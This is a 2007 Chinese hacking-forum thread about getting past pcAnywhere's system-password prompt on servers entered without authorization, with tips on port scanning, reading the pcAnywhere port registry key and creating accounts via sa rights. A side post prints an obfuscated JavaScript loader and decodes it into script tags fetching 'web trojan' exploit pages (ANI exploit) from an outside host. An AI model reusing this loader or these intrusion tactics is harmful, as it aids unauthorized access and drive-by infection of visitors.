[讨论]pcanywhere二次验证密码存放在哪?
议题作者:hackest信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
大家都知道pcanywhere是一个远程管理服务器的工具
但是在渗透中如何遇到服务器处于锁定状态
而我们又没有管理员权限的时候
也就是只拿到了pcanywhere的连接密码
却没有系统用户和密码
处于锁定状态的问题以前讨论过了
不过解决的方法貌似不太完美和实际
而且pcanywhere在连接上的时候即使没有管理员权限
也可以直接重启服务器
不过如果想要执行传送文件或者执行命令之类的操作就会要求进行二次验证
这个密码和pcanywhere的连接密码试了很多都没有发现相同的
不知道它的密码存放在哪里
总之找遍了*.cif文件所得的密码都无法通过验证!
难道是要求验证系统用户?!
希望大家讨论下,指点下小弟,嘿嘿[s:269] 二次验证密码?不会呀!我要传的话他直接让我输系统的......... 兄弟借个地方用一下 因为我不能发贴 谢谢!
--------------------------------------------------------
谁能帮我解密这段代码
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A("\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\v")',37,37,'164|42|163|57|143|162|157|151|160|156|56|134|11|145|167|155|76|74|12|15|75|40|146|165|152|113|61|71|72|150|53|51|50|144|116|126|eval'.split('|'),0,{}))
代码地址 [url]http://7y7.us/2.js[/url] 第一层加密
解后
eval("\151\156\146\157\40\75\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\126\145\162\156\165\155\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\11\53\42\134\156\42\53\15\12\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\116\145\167\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\15\12\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\151\156\146\157\51")
第二层加密
解后
info = "<script src=\"http://ws91.com/oK/Vernum.js\"></script>" +"\n"+
"<script src=\"http://ws91.com/oK/New.js\"></script>"
document.write(info)
ANI网马! [url]http://ws91.com/oK/Vernum.js[/url] //014网马
[url]http://ws91.com/oK/New.js[/url] //ANI网马 alert 再 八进制 就ok 七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
偶不是罐水哦 我汗,我的问题没解决
倒解决了你的问题,晕哦
正所谓强宾不压主 [s:263] [s:265] 跑题了,晕猪,回答的毛的问题哦!
管理员都不看一下索? 貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷 [s:263] [s:265] [quote]引用第9楼hackest于2007-04-19 16:42发表的 :
貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷 [s:263] [s:265][/quote]
是啊 就是系统密码 没有听说什么二次加密的DD [quote]引用第6楼huangqing于2007-04-19 16:10发表的 :
七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
.......[/quote]
楼上不好意思
人家换密码了~.
呵呵
现在是nikankan 写个解密页面吧。。。大大们。。。ALERT出来后的数据如何能复制呀。。。比如alert("aaa") 弹出对话框呀。。如何把弹出来的数据复制出来。。谢谢。。 <SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。 [quote]引用第3楼netpatch于2007-04-19 14:07发表的 :
第一层加密
解后
eval("151156146157407511114274163143162151160164401631621437513442150164164160725757167163716156143157155571571135712614516215616515556152163134427674571631431621511601647642115342134156425315121111427416314316215116016440163162143751344215016416416072575716716371615614315715557157113571161451675615216313442767457163143162151160164764215121512144157143165155145156164561671621511641455015115614615751")
第二层加密
解后
.......[/quote]
俺是一个菜鸟,请问:\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\“
这是用什么工具加密的?谢谢。 顶!<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。 那个是转换过的十六进制数啦
\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B
这些是十六进制形式的了! 楼上的你没看明白我的意思呵呵。。我是说如何将alert后的结果保存出来...他是个对话框。。。如何复制出来解密后的数据。。。 我R./........你们搞什么飞机,看清楚这个论题,这不是解密的................要研究专门开个帖子,害得我还以为有牛人弄出那什么二次密码了! 我也晕了啦
发个帖子被借掉了
下次不敢发了…… [s:267] 修改注册表..不使用2次密码 我这也有个问题,如果被控端修改了pcanywhere的默认连接端口,保存在哪里?
如果是保存在cif文件里,那么如何才能读取出来? 端口貌似是写进注册表的吧 [s:263] 谢楼上的啦,可惜我遇的那个服务器比较变态,可能没有权限读注册表 尝试文件传输。
个别情况下不需要验证系统密码。 我遇到的都是要验证的! [s:243] 就是系统密码! 如果你有sa权限的话 建立个超户就OK拉 C盘有访问权限,不可以写,支持WScript.Shell关闭了3389.43958等不知道怎么提啊,高手指教
QQ67469696 偶遇到一个的!!!!
能破解密码
就是改了端口
不知道怎么搞>>. 扫描对外开放的端口
找些你认为有可能的尝试连接 我靠 你可真搞笑
pcanywhere有2次密码?
什么意思 估计你说的是 桌面被锁定的情况吧
拜托 哪个是要用任意一个windows用户进入啊 找不到端口连接就扫描一下吧 毕竟不用默认的5631端口的机器很多
你扫扫看 要是能扫到就试试 扫不到的话 估计即使确实开放连接 由于防火墙或者别的什么原因
你也是无法连接的 [quote]引用第28楼wodehao448于2007-05-02 19:23发表的 :
偶遇到一个的!!!!
能破解密码
就是改了端口
不知道怎么搞>>.[/quote]
看能不能读注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort 在这里
页:
[1]